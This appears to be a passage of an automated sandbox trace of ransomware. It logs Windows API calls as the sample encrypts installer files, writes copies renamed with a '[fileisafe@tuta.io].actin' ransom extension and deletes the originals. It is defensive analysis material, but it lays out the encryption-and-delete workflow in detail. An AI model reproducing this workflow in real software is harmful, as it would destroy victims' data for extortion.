[0045.819] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71880) returned 1 [0045.819] CryptSetKeyParam (hKey=0xf71880, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.819] CryptEncrypt (in: hKey=0xf71880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0045.819] CryptDestroyKey (hKey=0xf71880) returned 1 [0045.819] WriteFile (in: hFile=0x31c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0045.819] CryptDestroyKey (hKey=0xf71640) returned 1 [0045.819] CloseHandle (hObject=0x318) returned 1 [0045.819] CloseHandle (hObject=0x31c) returned 1 [0045.820] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1028\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1028\\setupresources.dll")) returned 1 [0045.821] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.821] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0045.822] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=3726) returned 1 [0045.822] CloseHandle (hObject=0x31c) returned 1 [0045.823] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf")) returned 0x80 [0045.823] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.823] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0045.823] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.823] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.823] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0045.825] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d80) returned 1 [0045.825] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.825] ReadFile (in: hFile=0x31c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xe8e, lpOverlapped=0x0) returned 1 [0045.827] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xe90, dwBufLen=0xe90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xe90) returned 1 [0045.827] WriteFile (in: hFile=0x318, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xe90, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xe90, lpOverlapped=0x0) returned 1 [0045.828] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71e40) returned 1 [0045.829] CryptSetKeyParam (hKey=0xf71e40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.829] CryptEncrypt (in: hKey=0xf71e40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0045.829] CryptDestroyKey (hKey=0xf71e40) returned 1 [0045.829] WriteFile (in: hFile=0x318, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0045.829] CryptDestroyKey (hKey=0xf71d80) returned 1 [0045.829] CloseHandle (hObject=0x31c) returned 1 [0045.829] CloseHandle (hObject=0x318) returned 1 [0045.829] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1029\\eula.rtf")) returned 1 [0045.830] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.830] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0045.831] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=80970) returned 1 [0045.831] CloseHandle (hObject=0x318) returned 1 [0045.831] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml")) returned 0x80 [0045.831] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.831] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0045.831] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.831] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.831] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0045.831] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ec0) returned 1 [0045.831] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.831] ReadFile (in: hFile=0x318, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x13c4a, lpOverlapped=0x0) returned 1 [0045.834] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x13c50, dwBufLen=0x13c50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x13c50) returned 1 [0045.834] WriteFile (in: hFile=0x31c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x13c50, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x13c50, lpOverlapped=0x0) returned 1 [0045.836] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71c80) returned 1 [0045.836] CryptSetKeyParam (hKey=0xf71c80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.836] CryptEncrypt (in: hKey=0xf71c80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0045.836] CryptDestroyKey (hKey=0xf71c80) returned 1 [0045.836] WriteFile (in: hFile=0x31c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0045.837] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0045.837] CloseHandle (hObject=0x318) returned 1 [0045.837] CloseHandle (hObject=0x31c) returned 1 [0045.839] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1029\\localizeddata.xml")) returned 1 [0045.840] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.840] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0045.840] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=18264) returned 1 [0045.840] CloseHandle (hObject=0x31c) returned 1 [0045.840] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll")) returned 0x80 [0045.840] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.841] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0045.841] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.841] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.841] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0045.841] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71200) returned 1 [0045.841] CryptSetKeyParam (hKey=0xf71200, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.841] ReadFile (in: hFile=0x31c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x4758, lpOverlapped=0x0) returned 1 [0045.844] CryptEncrypt (in: hKey=0xf71200, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4760, dwBufLen=0x4760 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x4760) returned 1 [0045.844] WriteFile (in: hFile=0x318, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x4760, lpOverlapped=0x0) returned 1 [0045.845] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71800) returned 1 [0045.845] CryptSetKeyParam (hKey=0xf71800, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.845] CryptEncrypt (in: hKey=0xf71800, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0045.845] CryptDestroyKey (hKey=0xf71800) returned 1 [0045.845] WriteFile (in: hFile=0x318, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0045.845] CryptDestroyKey (hKey=0xf71200) returned 1 [0045.845] CloseHandle (hObject=0x31c) returned 1 [0045.845] CloseHandle (hObject=0x318) returned 1 [0045.846] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll")) returned 1 [0045.847] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.847] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0045.847] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=3314) returned 1 [0045.847] CloseHandle (hObject=0x318) returned 1 [0045.848] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf")) returned 0x80 [0045.848] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.848] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0045.848] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.848] SetFilePointerEx (in: hFile=0x318, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.848] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0045.850] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf718c0) returned 1 [0045.850] CryptSetKeyParam (hKey=0xf718c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.850] ReadFile (in: hFile=0x318, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xcf2, lpOverlapped=0x0) returned 1 [0045.852] CryptEncrypt (in: hKey=0xf718c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xd00, dwBufLen=0xd00 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xd00) returned 1 [0045.852] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xd00, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xd00, lpOverlapped=0x0) returned 1 [0045.853] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf716c0) returned 1 [0045.853] CryptSetKeyParam (hKey=0xf716c0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0045.853] CryptEncrypt (in: hKey=0xf716c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40, dwBufLen=0x40 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x40) returned 1 [0045.853] CryptDestroyKey (hKey=0xf716c0) returned 1 [0045.853] WriteFile (in: hFile=0x320, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xf2, lpOverlapped=0x0) returned 1 [0045.854] CryptDestroyKey (hKey=0xf718c0) returned 1 [0045.854] CloseHandle (hObject=0x318) returned 1 [0045.854] CloseHandle (hObject=0x320) returned 1 [0045.854] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1030\\eula.rtf")) returned 1 [0045.855] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0045.855] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0045.856] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=77748) returned 1 [0045.856] CloseHandle (hObject=0x320) returned 1 [0045.856] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml")) returned 0x80 [0045.856] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0045.856] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0045.856] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.856] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0045.856] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.212] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71d80) returned 1 [0046.212] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.212] ReadFile (in: hFile=0x320, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x12fb4, lpOverlapped=0x0) returned 1 [0046.216] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x12fc0, dwBufLen=0x12fc0 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x12fc0) returned 1 [0046.216] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x12fc0, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x12fc0, lpOverlapped=0x0) returned 1 [0046.219] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71a40) returned 1 [0046.219] CryptSetKeyParam (hKey=0xf71a40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.219] CryptEncrypt (in: hKey=0xf71a40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50, dwBufLen=0x50 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x50) returned 1 [0046.219] CryptDestroyKey (hKey=0xf71a40) returned 1 [0046.219] WriteFile (in: hFile=0x2e4, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x102, lpOverlapped=0x0) returned 1 [0046.219] CryptDestroyKey (hKey=0xf71d80) returned 1 [0046.219] CloseHandle (hObject=0x320) returned 1 [0046.219] CloseHandle (hObject=0x2e4) returned 1 [0046.221] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml")) returned 1 [0046.223] SetEvent (hEvent=0x2e8) returned 1 [0046.223] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0046.223] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.223] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=3419) returned 1 [0046.223] CloseHandle (hObject=0x2e4) returned 1 [0046.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf")) returned 0x80 [0046.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.223] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.223] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.223] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0046.223] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1031\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1031\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0046.230] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71b80) returned 1 [0046.230] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0046.230] ReadFile (in: hFile=0x2e4, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0xd5b, lpOverlapped=0x0) returned 1 [0046.233] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xd60, dwBufLen=0xd60 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0xd60) returned 1 [0046.233] WriteFile (in: hFile=0x32c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0xd60, lpOverlapped=0x0) returned 1 [0046.234] CryptImportKey (in: hProv=0xf466e8, 